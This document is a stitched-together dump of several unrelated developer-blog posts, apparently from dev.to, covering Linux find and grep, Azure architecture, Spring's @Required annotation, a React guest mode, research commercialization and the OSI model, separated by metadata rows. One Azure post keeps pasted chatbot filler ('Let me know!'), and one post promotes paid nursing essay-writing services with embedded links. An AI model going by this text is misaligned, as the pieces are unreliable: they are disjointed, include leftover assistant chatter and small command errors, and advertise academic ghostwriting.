The find command as highlighted briefly in the previous paragraph can also be used to locate file names within a given directory. However, unlike the locate command which searches through an indexed database containing filenames, the find command searches through the entire Linux file system to locate the files in question. This results in a much slower response time compared to the locate command. However, it has an advantage over the locate command by providing all files matching the search query at any time indicated irrespective of the time the file was saved unlike the locate command.
Here is a command to search for the file “laptop.txt” using find.
`Find laptop `

## Grep
This is a command used in Linux to search for words/phrases within various text file outputs. It’s an acronym which stands for Global regular expression print. It goes beyond locating the files which contain the text in question but also highlights the lines where these texts are found. Here is an example of how Grep can be used.
`grep laptop `

The above code searches for the text `“laptop”` in the Linux directory. It then outputs any files where this can be found. By default, the Grep command is highly case-sensitive, matching the texts only in the specified case format. However, due to its inherent flexibility, it can also output non-case-sensitive matches too. To achieve this, the –I command is added to the line text.
Here is a command to search for the text “laptop” eliminating the case sensitivity using grep.
`grep –i laptop laptop.txt `

This will output all matching text ignoring the case format of the text matches.
Also, Grep provides an inverse searching feature which highlights all other lines without the text to be matched in question and ignores the lines containing the text being matched in question.
`grep –vi laptop `
So far, these commands can be used to navigate through the Linux file directory to locate various files and text within the Linux OS. It is also essential to gain mastery of other Linux file commands such as `ls`, `mv`, `rm` and `rmdir` which can be used in file navigation and file structure modification.
## Conclusion
With this, we have come to the end of the tutorial. We hope you’ve learned essentially about Linux commands, how to use them and their pros and cons. Feel free to drop any questions or comments in the comment box below. You can also reach out to me on my blog also check out my other articles [here] (linktr.ee/tobilyn77). Till next time, keep on coding!
| oluwatobi2001 |
1,877,744 | Unlocking The Power Of Azure | ~~Microsoft **Azure is a leading cloud computing platform that has revolutionized the way business... | 0 | 2024-06-06T21:50:47 | https://dev.to/tojumercy1/unlocking-the-power-of-azure-1n71 | azure, cloud, devops, computerscience | ~**~Microsoft **Azure is a leading cloud computing platform that has revolutionized the way business approach computing ,storage and network over the internet
---**Azure**important in the cloud computing landscape cannot be overstated .It offers a robust and scalable infrastructure for business to build ,deploy and manage applications and services.
~~**This** introduction set the stage for exploring the core architectural component's of Azure :
Let's dive into the first core architectural component of Azure:
1.## Azure Resource Manager (ARM)
Azure Resource Manager (ARM) is the deployment and management service for Azure resources. It provides a unified way to create, manage, and deploy resources across Azure. With ARM, you can:
- Define infrastructure as code using templates (ARM templates)
- Deploy and manage resources consistently across different environments (dev, test, prod)
- Organize resources into logical groups (resource groups)
- Apply access control and permissions (RBAC)
- Monitor and troubleshoot resources
ARM is the foundation of Azure's resource management and deployment capabilities. It enables you to define and manage your Azure resources in a consistent, reproducible, and scalable way.
Here are some key benefits of using ARM:
- Infrastructure as Code: ARM templates allow you to define your infrastructure as code, making it easier to version, manage, and reproduce your environment.
- Consistency: ARM ensures consistency across different environments and deployments, reducing errors and inconsistencies.
- Scalability: ARM enables you to scale your resources up or down as needed, without worrying about manual configuration and deployment.
Next, I can move on to Azure Virtual Machines (VMs) as the next core architectural component of Azure. Let me know!
Let's continue with the next core architectural component of Azure:
2.** Azure Virtual Machines (VMs)**
Azure Virtual Machines (VMs) are virtualized computers that run in Azure. They provide a flexible and scalable way to deploy applications and services. With Azure VMs, you can:
- Choose from a range of operating systems and configurations
- Scale up or down as needed
- Use Azure VMs as a lift-and-shift solution for on-premises applications
- Take advantage of Azure's managed disk and storage capabilities
Azure VMs are built on top of Azure's robust infrastructure and provide features like:
- High availability and reliability
- Security and compliance
- Networking and connectivity
- Monitoring and diagnostics
Next, I can move on to Azure Storage as the next core architectural component of Azure. Let me know!
Let's move on to the next core architectural component of Azure:
3.## Azure Storage
Azure Storage is a highly durable and scalable cloud storage service that allows you to store and access data in the cloud. It provides a range of storage options, including:
- Blob Storage: For storing unstructured data like images, videos, and files
- File Storage: For storing and sharing files in a hierarchical structure
- Queue Storage: For passing messages between applications and services
- Table Storage: For storing structured data in a NoSQL database
- Disk Storage: For attaching data disks to virtual machines
Azure Storage provides features like:
- Data redundancy and replication for high availability
- Scalability to store large amounts of data
- Security and access control
- Data compression and encryption
- Integration with Azure services and applications
This is a diagram for Azure storage below;

Next, I can move on to Azure Networking as the next core architectural component of Azure. Let me know!
Let's move on to the next core architectural component of Azure:
4## . Azure Networking
Azure Networking provides a range of services that enable you to create, manage, and secure networks in Azure. These services include:
- Virtual Networks (VNets): Private networks in Azure that isolate your resources
- Subnets: Subdivisions of VNets for organizing resources
- Network Security Groups (NSGs): Firewall rules for controlling traffic
- Load Balancers: Distributing traffic across resources
- Application Gateways: Web traffic management and security
- ExpressRoute: Dedicated connections to Azure from on-premises infrastructure
Azure Networking provides features like:
- Secure and isolated networks
- Scalability and high availability
- Network segmentation and isolation
- Traffic management and load balancing
- Integration with Azure services and applications
This a diagram of Azure networking below;

Next, I can move on to Azure Analytics and AI as the next core architectural component of Azure. Let me know!
Let's move on to the next core architectural component of Azure:
5.Azure Analytics and AI
Azure Analytics and AI provide a range of services that enable you to build, deploy, and manage analytics and AI solutions in Azure. These services include:
- Azure Synapse Analytics: A cloud-based data warehouse and analytics service
- Azure Databricks: A fast, easy and collaborative Apache Spark-based analytics platform
- Azure Machine Learning: A cloud-based platform for building, deploying, and managing machine learning models
- Azure Cognitive Services: A set of pre-built AI models for vision, speech, language, and decision-making
- Azure Search: A cloud-based search service for applications and websites
Azure Analytics and AI provide features like:
- Data processing and analytics
- Machine learning and AI model development
- Natural language processing and computer vision
- Predictive analytics and forecasting
- Integration with Azure services and applications
Here's a conclusion summarizing the key points of our tour of Azure's core architectural components:
Azure is a comprehensive cloud platform that offers a wide range of services and tools for building, deploying, and managing applications and workloads. The core architectural components of Azure include:
1. Compute: Virtual Machines, Functions, and Container Instances
2. Storage: Blob, File, Queue, Table, and Disk Storage
3. Networking: Virtual Networks, Load Balancers, and Application Gateways
4. Analytics and AI: Synapse Analytics, Machine Learning, Cognitive Services, and Search
These components provide a solid foundation for building, deploying, and managing a wide range of applications and workloads in Azure. By leveraging these services, developers and organizations can take advantage of the scalability, reliability, and security of the Azure cloud platform.
I hope this tour has provided a helpful overview of Azure's core architectural components! Let me know if you have any further questions or need more information on any of these services .Here are some suggestions to encourage readers to explore Azure:
1. Try Azure for free: Highlight the free trial offer and the benefits of exploring Azure without committing to a paid subscription.
2. Hands-on tutorials and guides: Provide links to step-by-step tutorials, guides, and labs that help readers get started with Azure services.
3. Real-world use cases and success stories: Share examples of how businesses and organizations are using Azure to solve real-world problems and achieve success.
4. Azure community and forums: Encourage readers to join the Azure community, participate in forums, and connect with experts and peers.
5. Azure certifications and training: Mention the benefits of getting certified in Azure and provide resources for training and upskilling.
6. Innovative features and updates: Highlight the latest innovations and updates in Azure, showcasing its constantly evolving nature.
7. Cost-effective and scalable: Emphasize how Azure can help reduce costs and scale resources as needed.
8. Secure and compliant: Highlight Azure's robust security and compliance features, giving readers peace of mind.
9. Integration with other Microsoft tools: Show how Azure integrates seamlessly with other Microsoft tools and services.
10. Call to action: End with a clear call to action, encouraging readers to sign up for a free trial or explore Azure further.
Example:
"Ready to unlock the full potential of Azure? Sign up for a free trial today and start exploring the many services and features that Azure has to offer. From machine learning to data analytics, and from security to compliance, Azure has the tools you need to take your business to the next level. Join the Azure community, get certified, and start building your cloud-first future!" | tojumercy1 |
1,879,674 | Understanding Spring's @Required Annotation: A Legacy Perspective | While the @Required annotation has been deprecated since Spring Framework 5, it's not uncommon to... | 27,602 | 2024-06-06T21:38:33 | https://springmasteryhub.com/2024/06/06/understanding-springs-required-annotation-a-legacy-perspective/ | java, programming, spring, springboot | While the `@Required` annotation has been deprecated since Spring Framework 5, it's not uncommon to encounter it in legacy projects.
So, why should you care?
Not every project is built on a fresh new Spring Framework version; there are a lot of legacy projects out there, and maybe you are working on one right now or will work on one in the future.
So, after reading this blog post, you will understand what this annotation does and how it's used.
Maybe you are reading this right now because of it.
## **What @Required Does**
It tells Spring that a specific bean property, as the annotation name says, is **required**.
It is a method-level annotation that checks if the required property was set at configuration time. If the dependency is not provided when the bean was created, Spring will throw a `BeanInitializationException`.
This was useful in the past to make some bean properties mandatory.
Today, you can achieve this by putting the dependencies in the bean constructor or by using an `@Autowired` annotation in the set method.
## **How Was It Used?**
Assuming we have this bean definition:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="
http://www.springframework.org/schema/beans> http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="employee" class="Employee">
<property name="name" value="John Doe" />
</bean>
</beans>`
```
And this Java code:
```java
public class Employee {
private String name;
@Required
public void setName(String name) {
this.name = name;
}
}
```
The `@Required` checks if the `name` property was set. If it is not, it will throw the exception we mentioned above, when trying to configure this bean.
Now the next time you work on a legacy project, you’ll be already familiar with this annotation.
If you like this topic, make sure to follow me, in the following days, I’ll be explaining more about the Spring annotations!
Stay tuned!
[Willian Moya (@WillianFMoya) / X (twitter.com)](https://twitter.com/WillianFMoya)
[Willian Ferreira Moya | LinkedIn](https://www.linkedin.com/in/willianmoya/)
**References**
- https://www.tutorialspoint.com/spring/spring_required_annotation.htm
- https://www.geeksforgeeks.org/spring-required-annotation-with-example/
- https://docs.spring.io/spring-framework/docs/2.5.6/javadoc-api/org/springframework/beans/factory/annotation/Required.html | tiuwill |
1,774,014 | I had to create a Guest Mode mechanism in React.JS | Introducing As usual, in all of my previous projects I had to use some auth provider to do... | 0 | 2024-06-06T21:34:22 | https://dev.to/pvinicius/i-had-to-create-a-guest-mode-mechanism-in-reactjs-5abf | webdev, beginners, react, learning | ## Introducing
As usual, in all of my previous projects I had to use some auth provider to do the authentication mechanism, but this case would be different, besides the usual case using an auth provider, I'd create a guest mode mechanism.
## My Use Case
if you are a logged user you can save a lot of projects into the app, but as a guest user can save only 1 project, also if guest users wants login, his project can be stored on DB.
## What solution did I apply?
I choose indexedDB to save all guest users data in the browser, and I counted with Dexie(https://dexie.org/docs/Tutorial/React) to helpe me.
Basically I created a hook to instance my indexedDB, and all of methods like add, update and remove, and then can use it anywhere.

the thing is, all data will be deleted if the user does or programatilly, this is amazing :)))))
| pvinicius |
1,879,672 | Elevating Your Nursing Journey: The Role of BSN Writing Services | Elevating Your Nursing Journey: The Role of BSN Writing Services As you embark on your educational... | 0 | 2024-06-06T21:31:20 | https://dev.to/carlo34/elevating-your-nursing-journey-the-role-of-bsn-writing-services-k0n | **Elevating Your Nursing Journey: The Role of BSN Writing Services**
As you embark on your educational journey towards a Bachelor of Science in Nursing (BSN), you're likely to encounter various challenges along the way. From mastering complex medical concepts to balancing clinical rotations and academic coursework, the path to becoming a registered nurse requires dedication, perseverance, and a commitment to excellence. One area where many nursing students find themselves [take my online nursing class](https://bsnwritingservices.com/) seeking assistance is academic writing. Fortunately, BSN writing services are available to provide the support and guidance you need to succeed in your studies. In this comprehensive guide, we'll explore the importance of academic writing in nursing education, the types of services offered by BSN writing companies, the benefits of utilizing these services, and ethical considerations to keep in mind.
\### Importance of Academic Writing in Nursing Education
Academic writing plays a crucial role in nursing education for several reasons:
\#### 1. Critical Thinking and Analytical Skills Development
Writing essays, research papers, and case studies requires you to analyze information, evaluate evidence, and formulate coherent arguments. These activities help develop critical thinking and analytical skills essential for clinical practice.
\#### 2. Preparation for Evidence-Based Practice (EBP)
Nursing is grounded in evidence-based practice (EBP), which involves integrating the best available evidence with clinical expertise and patient preferences. Engaging in academic writing teaches you how to critically appraise research literature, identify gaps in knowledge, and apply evidence to inform decision-making in healthcare settings.
\#### 3. Professional Communication Enhancement
Clear and effective communication is essential in nursing practice. Academic writing helps you refine your communication skills, allowing you to convey complex medical information accurately and professionally. This skill is invaluable for [capella 4030 assessment 3](https://bsnwritingservices.com/capella-4030-assessment-3/) documenting patient care, collaborating with interdisciplinary teams, and educating patients and their families.
\### Types of BSN Writing Services
BSN writing services offer a range of assistance tailored to meet your specific needs:
\#### 1. Essay Writing Assistance
Whether it's a reflective essay on a clinical experience or an analytical essay on nursing theories, BSN writing services can help you craft well-researched and logically structured essays that meet academic standards.
\#### 2. Research Paper Support
Research papers are a fundamental aspect of nursing education. BSN writing services provide guidance throughout the research process, from formulating research questions to presenting findings in a coherent manner.
\#### 3. Case Study Analysis
Analyzing case studies is an effective way to apply theoretical knowledge to real-world clinical scenarios. BSN writing services assist you in identifying key issues, developing evidence-based care plans, and synthesizing information to make informed decisions.
\#### 4. Coursework Assistance
From anatomy and physiology to pharmacology and nursing ethics, BSN coursework covers a wide range of topics. BSN writing services offer customized assistance with coursework assignments, ensuring that you submit accurate and well-written work.
\#### 5. Capstone Project Guidance
The capstone project is a culmination of your [capella 4900 assessment 5](https://bsnwritingservices.com/capella-4900-assessment-5/) nursing education, allowing you to integrate knowledge and skills into a comprehensive project addressing a significant healthcare issue. BSN writing services provide mentorship and support throughout the capstone project process, helping you develop research proposals, collect and analyze data, and write final reports.
\### Benefits of Utilizing BSN Writing Services
Utilizing BSN writing services offers numerous benefits:
\#### 1. Academic Support and Guidance
BSN writing services provide personalized assistance tailored to your individual needs, helping you navigate the complexities of academic writing and research.
\#### 2. Time Management and Work-Life Balance
By alleviating some of the academic workload, BSN writing services help you manage your time more effectively, allowing you to focus on clinical training and maintain a healthy work-life balance.
\#### 3. Improved Academic Performance
By providing well-researched and professionally written assignments, BSN writing services contribute to improved academic performance, leading to higher grades and a deeper understanding of nursing concepts.
\#### 4. Stress Reduction
The pressure to excel academically can be stressful. BSN writing services alleviate some of this stress by providing the support you need to succeed academically, allowing you to focus on other aspects of your education and personal life.
\#### 5. Enhanced Professional Development
Effective communication and critical thinking skills are essential for success [capella 4060 assessment 4](https://bsnwritingservices.com/capella-4060-assessment-4/) in nursing practice. By honing these skills through academic writing, you develop the foundation for lifelong learning and professional growth.
\### Ethical Considerations
While BSN writing services offer valuable support, it's essential to use them ethically:
\- View BSN writing services as supplements to your learning and academic development, rather than shortcuts to academic success.
\- Ensure all work submitted is original and properly cited to avoid plagiarism.
\- Engage actively with the writing process and incorporate feedback to improve writing skills.
\- Respect academic integrity and the intellectual property rights of others.
\### Choosing the Right BSN Writing Service
When selecting a BSN writing service, consider the following factors:
\- Qualifications and expertise of the service's writers.
\- Range of services offered, including essay writing, research paper assistance, and capstone project guidance.
\- Reputation for quality, reliability, and customer
satisfaction, as evidenced by reviews and testimonials from other nursing students.
\- Commitment to confidentiality and ethical conduct, including policies regarding plagiarism and academic integrity.
\- Level of communication and support provided, including responsiveness to inquiries and willingness to accommodate revisions.
\### Conclusion
In conclusion, BSN writing services play a vital role in supporting nursing students throughout their educational journey. By offering personalized assistance with academic writing and research, these services empower students to develop essential skills for success in nursing practice. From essay writing to capstone project guidance, BSN writing services provide invaluable support that enhances academic performance, reduces stress, and promotes professional development. However, it's essential to use these services ethically, respecting academic integrity and viewing them as supplements to your learning process. By choosing the right BSN writing service and engaging actively with the writing process, you can elevate your nursing education and prepare yourself for a rewarding career in healthcare.
Certainly! Let's delve deeper into some of the specific benefits of utilizing BSN writing services, as well as explore additional considerations for selecting the right service provider:
\### More Benefits of Utilizing BSN Writing Services:
\#### 6. Access to Expertise:
BSN writing services employ writers with backgrounds in nursing and academic writing. These experts understand the nuances of nursing education and are well-versed in the expectations of academic institutions. By accessing their expertise, students can ensure that their assignments are of high quality and meet the standards required for academic success.
\#### 7. Customized Assistance:
One of the key advantages of BSN writing services is their ability to provide customized assistance tailored to the unique needs of each student. Whether you require help with a specific aspect of an assignment or comprehensive support throughout the entire writing process, these services can adapt to your requirements and provide the level of assistance you need.
\#### 8. Confidence Boost:
Navigating the demands of a BSN program can be challenging, and academic writing assignments can often feel overwhelming. BSN writing services provide students with the support and guidance they need to tackle these assignments with confidence. Knowing that they have access to professional assistance can alleviate anxiety and empower students to excel academically.
\#### 9. Time Savings:
Balancing coursework, clinical rotations, and personal commitments can leave little time for academic writing. BSN writing services help students save time by handling some of the writing workload. This allows students to focus their time and energy on other aspects of their education and personal lives, ultimately promoting a better work-life balance.
\#### 10. Networking Opportunities:
Some BSN writing services may offer opportunities for networking and collaboration with other nursing students. Through online forums, discussion groups, or workshops, students can connect with peers, share experiences, and learn from one another. These networking opportunities can enhance the overall educational experience and foster a sense of community among students.
\### Additional Considerations for Choosing the Right BSN Writing Service:
\#### 1. Pricing Structure:
Consider the pricing structure of the BSN writing service and ensure it aligns with your budget. Look for transparent pricing policies that clearly outline the cost of services and any additional fees. Be wary of services that offer significantly lower prices than others, as this may indicate a lack of quality or reliability.
\#### 2. Samples and Portfolio:
Before choosing a BSN writing service, review samples of their work or ask for a portfolio of past assignments they have completed. This will give you an idea of the quality of their writing and whether it meets your expectations. Look for evidence of thorough research, clear writing, and proper formatting in the samples provided.
\#### 3. Revision Policy:
Check the revision policy of the BSN writing service to ensure they offer revisions if needed. It's essential to have the option to request revisions if you are not satisfied with the final product or if any changes are required. Ideally, the service should offer a reasonable number of revisions at no additional cost.
\#### 4. Customer Support:
Evaluate the level of customer support provided by the BSN writing service. Look for services that offer responsive customer support channels, such as email, phone, or live chat. Prompt and helpful customer support can make a significant difference in your experience with the service.
\#### 5. Guarantees:
Review any guarantees offered by the BSN writing service, such as satisfaction guarantees or money-back guarantees. These guarantees provide reassurance that you will receive quality work and that your satisfaction is a priority for the service provider.
\### Conclusion
BSN writing services offer numerous benefits to nursing students, including access to expertise, customized assistance, confidence boost, time savings, and networking opportunities. When choosing a BSN writing service, consider factors such as pricing structure, samples/portfolio, revision policy, customer support, and guarantees. By selecting the right BSN writing service and leveraging their support effectively, you can enhance your academic performance, reduce stress, and maximize your success in your nursing education journey. | carlo34 | |
1,879,641 | Mastering the core components of Azure architecture | MICROSOFT AZURE CORE ARCHITECTURAL COMPONENTS Microsoft Azure is built on a few key... | 0 | 2024-06-06T21:31:14 | https://dev.to/adah_okwara_3c43c95a89a2e/understanding-the-core-architectural-components-of-azure-26me | azure, cloudcomputing, architecture, microsoftcloud | ## MICROSOFT AZURE CORE ARCHITECTURAL COMPONENTS
Microsoft Azure is built on a few key elements that help keep your services running smoothly and reliably. The main components include Azure regions, Azure Availability Zones, resource groups, and the Azure Resource Manager. In this blog, we will explore what each of these components does and how they work together to provide high availability and redundancy.
**AZURE REGIONS**
Azure regions are groups of data centers located within a specific geographic area, connected by a high-speed, low-latency network. These regions help ensure data sovereignty, compliance, and resiliency. Currently, Azure has 42 regions worldwide, with 12 more planned for the future.
**AZURE AVAILABILITY ZONES**
Azure Availability Zones are designed to protect your applications and data from data center failures. Each Availability Zone is a distinct physical location within an Azure region, and each zone has its own independent power, cooling, and networking infrastructure.
Imagine you have a house with different rooms, and each room has its own power source, air conditioning, and internet connection. Now, let's say you have some very important gadgets in your house that you absolutely can't afford to lose or have go offline, like your computer or your TV.
Azure Availability Zones are like having three identical houses next to each other, but each house is designed so that if something goes wrong in one house, like a power outage or internet trouble, the other two houses keep working just fine. In each house, there are different areas (like rooms) that are set up in such a way that if one area has a problem, the rest of the house can still operate smoothly.
When you put your important gadgets in these three houses (Azure Virtual Machines in different Availability Zones), you're making sure they are spread out so that if something goes wrong in one area or one entire house, the others keep running without any interruption. This way, you're protecting your gadgets from any issues that might happen in a single house or area.
Azure promises that if you use these Availability Zones, your gadgets will be up and running 99.99% of the time, which is really reliable and helps keep everything working smoothly even if something unexpected happens.
**RESOURCE GROUPS IN AZURE**
This a logical container for Azure resources.
Imagine resource groups in Azure as organized digital containers, like labeled boxes, where you neatly keep your online stuff. Just as you might pack all your kitchen items in one box when moving, you can group related Azure resources together in a resource group.
For example, if you have a website and a database that goes with it, you'd put both of them in the same resource group. This makes it easier to manage costs, simplifies resource management and organization, and helps with management and deployment tasks.
_**Here are some key benefits of using resource groups:
_**
Easier Cost Management: By grouping resources in a resource group, you can track and manage costs more efficiently. It's like having a separate budget for each labeled box, making it clear what you're spending on each part of your Azure solution.
Simplified Resource Management & Organization: Resource groups help you keep things tidy and organized. You can easily see which resources are related to which part of your project, making it simpler to manage and keep track of everything.
****Simplifies Management & Deployment: ** **When it's time to manage or deploy resources, having them grouped in resource groups makes the process smoother. You can apply changes or updates to a whole group at once, rather than dealing with each resource individually.
Grouping by Application, Environment, or Department: Resource groups are flexible, allowing you to group resources based on your needs. Whether it's by application (like putting all components of your web app together), environment (like separating resources for development and production), or department (like grouping resources used by different teams), resource groups make it easy to organize things according to your project's structure.
So, think of resource groups as your digital storage solution that not only keeps your online stuff organized but also makes managing, deploying, and budgeting for your Azure resources a whole lot simpler.
**AZURE RESOURCE MANAGER (ARM)**
Imagine Azure as a bustling city with different buildings and services, and your application deployed in Azure is like a complex building with various parts - virtual machines, storage, a web app, and a database. These parts work together to make your application run smoothly, just like how different components in a building work together.
Now, think of Azure Resource Manager as the city planner or manager. It's the tool that helps you oversee and manage all these parts of your application as if you were managing a whole building complex.
**Benefits: **
Deployment and Management: With Azure Resource Manager, you can deploy, update, and manage all the parts of your application at once. It's like taking care of everything in your building complex in one go, from construction to maintenance.
**Templates for Easy Deployment: ** Resource Manager provides templates that make deploying your application easier. These templates are like ready-made plans that ensure everything is set up correctly, just like how you'd use a blueprint to build a house.
Consistent Management and Security: Resource Manager gives you a consistent way to manage all your resources in Azure. It also helps keep your resources secure with features like Role-Based Access Control (RBAC), which is like having keys to different areas of your building complex for different people.
Tagging for Organization: You can use tagging features to organize and keep track of your resources. It's like putting labels on different parts of your building complex so you can find and manage them easily.
So, Azure Resource Manager is like your digital city manager, helping you keep everything organized, secure, and running smoothly in your Azure "city."
In essence, Azure's core architectural components form the backbone of a robust and scalable cloud infrastructure. From virtual machines and storage accounts to web apps and databases, each component plays a vital role in creating and maintaining modern cloud-based solutions.
And just as a city planner organizes and manages a city, Azure Resource Manager brings all these components together seamlessly. It's like having a superhero overseeing your digital city, making sure everything runs smoothly and securely.
By leveraging these foundational elements, businesses can build resilient and efficient applications in the cloud, empowering innovation and growth in today's digital landscape
| adah_okwara_3c43c95a89a2e |
1,879,607 | So I Built This: Broadening the Impact of What You’ve Built in the Lab | How the non-profit, foundation model may be your solution to the challenge of broadening the impact... | 0 | 2024-06-06T21:24:43 | https://medium.com/@jasoncorso/so-i-built-this-broadening-the-impact-of-what-youve-built-in-the-lab-31a5e591713d | computervision, ai, machinelearning, datascience | How the non-profit, foundation model may be your solution to the challenge of broadening the impact of your research

_<center>So I Built This discusses how to align your actions with your interests when considering different ways to broaden the impact of your academic research. Image generated by DALL-E._</center>
In recent months, I’ve noticed a trend: colleagues approaching me with an eerily similar question that taps into a larger issue facing academics and innovators alike:
> “So, I built this. It’s gotten really excellent early feedback. I want to bring it to more people, what should I do?”
Now, believe me, I’m both an academic and a startup founder-operator, I have some pretty interesting colleagues. So when one begins with “So I built this,” I give them my attention. What they’ve built is almost certainly state-of-the-art in some capacity. And they’ve each observed its value when used in their early user testing.
In each case, of course, my colleagues shared details about what they had built and their ideas on what they could do next. But, those details don’t matter greatly, and I want to respect the privacy of the individuals who came to me. I do believe in all of these encounters there was genuine interest in broadening the impact of what they built.
Below, I’ll break down these conversations into key questions and responses, offering insights on whether to start a company, apply for a grant, or consider a non-profit foundation for broadening the impact of such an innovation.
Interestingly, in these discussions, it turned out that my colleagues really did not have much interest in building a startup company. They sincerely wanted to see their work adopted. But, they ultimately were less committed to the daunting prospect of building a startup, a roller coaster ride of challenges that is neither for the lighthearted, nor in alignment with the classical performance indicators of academics. This led us to focus on the idea of creating a non-profit or foundation to support broader adoption.
## Should I start a company for this?
Essentially, no matter how steeped in the academic world these folks are, they understand that startups and university spinouts are a natural option for academics to bring the fruits of their labor to a broader user base. However, actually operating a company means work that likely none of these folks or their team members were trained for or had a particular interest in doing. This is intellectually stimulating work like building a go-to-market strategy and evaluating product-market fit, and it is operations labor like managing a payroll provider, etc. And this is not even getting close to the work required for getting funding from seed or venture investors, which itself takes significant effort.
After talking about this with each of my inquiring colleagues, it became increasingly clear that although they had passion for their innovation, they did not necessarily have passion for building a company to bring it to market. In each case, we tended to leave this part of the discussion at some form of: “if you are really going to consider starting a company for this, then you need to ensure that you are fully committed to its success.” Starting a company is no small task.
Oddly, we talked about finding other people to actually start the company for them, which is a classical way of approaching this problem for academics. Yet, none seemed willing to hand over the control, which would ultimately be necessary.
## Should I apply for an SBIR?
Inevitably, being academics, we also talked about applying for a grant to fund the work of broadening adoption. Most federal funding agencies in the US have a [Small Business Innovation Research (SBIR) ](https://www.sbir.gov/)grant program that aims to stimulate technological innovation by funding small businesses to help commercialize their innovations, thereby fostering economic growth and addressing specific governmental needs. While the program’s aim of stimulating innovation is important, it’s not obvious to me that it’s a match for this case.
First, you began the conversation telling me you’ve already built something worthwhile. As far as I know, the SBIR program is for yet-to-be-built extensions of your innovation that you may or may not have much interest in.
Second, I’ve seen numerous cases over the years where someone starts a company funded by an SBIR with the intention of building a business. However, the lifecycle of one SBIR turns out to be insufficient to actually bootstrap the business. So, the founders then need to secure further funding. They could try to go to seed or venture funding. But, this would be a challenge. Although the SBIR grant mentions an emphasis on a business plan, it seems rare that actual customer outreach and product-market fit are established during the work of a typical SBIR.
These academic founders would need to emphasize the other half of the startup — building the actual business — which is a muscle not frequently developed during the grant period.
This makes it difficult to convince investors, especially given the time already invested in the company. Instead, the much easier thing to do is apply for another SBIR, laying the groundwork for what are commonly called “SBIR shops,” i.e., small businesses whose primary go-to-market approach is funding through SBIR programs, rarely turning anything into an actual commercial product.
Third, the principle of the SBIR grant is to, in good faith, actually attempt to start a business based on the technology you develop in the grant. It is not free money; in fact, it is tax-payer money marked for stimulating technological innovation in new small businesses. Is this something you really want to do? As I said above, it is not a decision to be taken lightly.
## Have you considered a non-profit or a foundation?
While my colleagues and I explored various options for their business endeavors, such as licensing their innovation to another company, our conversations consistently gravitated towards a different model that seemed to better fit the needs and goals of academic innovators. Since these individuals did not want to focus on the work of building a startup company, the route to a non-profit or foundation seemed more appropriate. This route would enable them to maintain a mission-driven focus emphasizing the adoption and impact of their innovation irrespective of the commercial viability.
The [Embodied AI Foundation](https://www.embodiedaifoundation.org/) is probably the first place I learned about this different style of broadening adoption of technical work. It supports the highly popular open source CARLA autonomous driving simulator, for example. This model is, however, becoming more popular. I find it popping up in numerous ways to support various innovations. For example, the [Common Visual Data Foundation](http://www.cvdfoundation.org/) was created to provide long-term support for the wildly popular [Common Objects in Context (COCO) dataset](https://cocodataset.org/#home) in computer vision.
While this may be an attractive model that lets the academic achieve their impact goals without the challenges inherent in creating a for-profit entity, it is not without its own risks. The two biggest being funding and operations. How will you fund the effort? This may indeed mean grant programs like those above, but it also unlocks different types of money that emphasize such non-profits as long as your mission is in alignment with those of the money source. Operationally, at least once the effort grows, you likely still need to find someone to help you run the entity. Yet, these challenges seem to me to be a heck of a lot easier than the challenges of starting a for-profit entity.
## Closing
In conclusion, while the allure of a grant- or venture-backed startup company might initially seem like the most direct route to broadening the impact of what you’ve built, it’s essential to consider alternative models that align better with your goals and resources. The non-profit or foundation route offers a mission-driven approach that prioritizes adoption and societal impact over commercial gain, mitigating many of the operational burdens and risks associated with for-profit ventures. As we’ve discussed, it’s not without its challenges, particularly in funding and management, but it offers a viable path for academics passionate about their creations yet hesitant to embark on the startup rollercoaster. By focusing on your mission and leveraging the support of grants and philanthropic funding, you can achieve a broader and more sustainable impact with your innovation.
### Acknowledgments
Thank you to my colleague Michelle Brinich for reviewing and editing this blog.
### Biography
Jason Corso is Professor of Robotics, Electrical Engineering and Computer Science at the University of Michigan and Co-Founder / Chief Science Officer of the AI startup Voxel51. He received his PhD and MSE degrees at Johns Hopkins University in 2005 and 2002, respectively, and a BS Degree with honors from Loyola University Maryland in 2000, all in Computer Science. He is the recipient of the University of Michigan EECS Outstanding Achievement Award 2018, Google Faculty Research Award 2015, Army Research Office Young Investigator Award 2010, National Science Foundation CAREER award 2009, SUNY Buffalo Young Investigator Award 2011, a member of the 2009 DARPA Computer Science Study Group, and a recipient of the Link Foundation Fellowship in Advanced Simulation and Training 2003. Corso has authored more than 150 peer-reviewed papers and hundreds of thousands of lines of open-source code on topics of his interest including computer vision, robotics, data science, and general computing. He is a member of the AAAI, ACM, MAA and a senior member of the IEEE.
### Disclaimer
This article is provided for informational purposes only. It is not to be taken as legal or other advice in any way. The views expressed are those of the author only and not his employer or any other institution. The author does not assume and hereby disclaims any liability to any party for any loss, damage, or disruption caused by the content, errors, or omissions, whether such errors or omissions result from accident, negligence, or any other cause.
### Copyright 2024 by Jason J. Corso. All Rights Reserved.
No part of this publication may be reproduced, distributed, or transmitted in any form or by any means, including photocopying, recording, or other electronic or mechanical methods, without the prior written permission of the publisher, except in the case of brief quotations embodied in critical reviews and certain other noncommercial uses permitted by copyright law. For permission requests, write to the publisher via direct message on X/Twitter at _JasonCorso_.
| jasoncorso |
1,879,671 | Data journey through the Internet - The OSI model approach | These last couple of years have seen the Internet become such a staple tool in humanity that it is... | 0 | 2024-06-06T21:22:41 | https://dev.to/amaraiheanacho/data-journey-through-the-internet-the-osi-model-approach-1n4a | networking, osimodel, internet, data | These last couple of years have seen the Internet become such a staple tool in humanity that it is hard to imagine a world without it, let alone imagine that most of human history and advancements happened without it.
But the Internet, as mystical as it seems, can simply be explained as a large network connecting countless diverse computers and devices, all looking to communicate with each other. Although these devices operate under different protocols, use different data formats, and use different addressing schemes, they can all exchange data seamlessly due to the standardization offered by the OSI model.
This article gets into what exactly the OSI model is and how it is used to send data through the internet.
## What is the OSI model?
The [Open Systems Interconnection (OSI)](https://aws.amazon.com/what-is/osi-model/) model, developed by the [International Organization for Standardization (ISO)](https://www.iso.org/) in 1984, acts as a blueprint for network communication. It breaks down communication between computer systems into seven layers: Physical, Data Link, Network, Transport, Session, Presentation, and Application.

*The OSI model layers, image from Cloudflare*
But before getting right into this article, it is important to note that while this article focuses on the OSI model, published in 1984, you must acknowledge that how you communicate over the Internet has evolved since then.
